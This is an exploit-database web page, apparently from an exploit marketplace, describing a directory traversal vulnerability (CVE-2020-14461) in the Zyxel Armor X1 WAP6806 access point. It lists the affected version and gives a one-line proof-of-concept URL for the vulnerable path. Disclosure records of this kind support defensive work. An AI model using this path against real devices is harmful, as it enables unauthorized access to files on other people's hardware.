[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zyxel Armor X1 WAP6806 - Directory Traversal Vulnerability

Author
Rajivarnan R
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-34686
Category
web applications
Date add
15-07-2020
CVE
CVE-2020-14461
Platform
hardware
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]

# As a result of the research, one vulnerability identified. 
# (Directory Traversal)
# Technical information is provided below step by step.

# [1] - Directory Traversal Vulnerability

# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]

# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
<https://target/Zyxel/images/eaZy/>

#  0day.today [2024-10-05]  #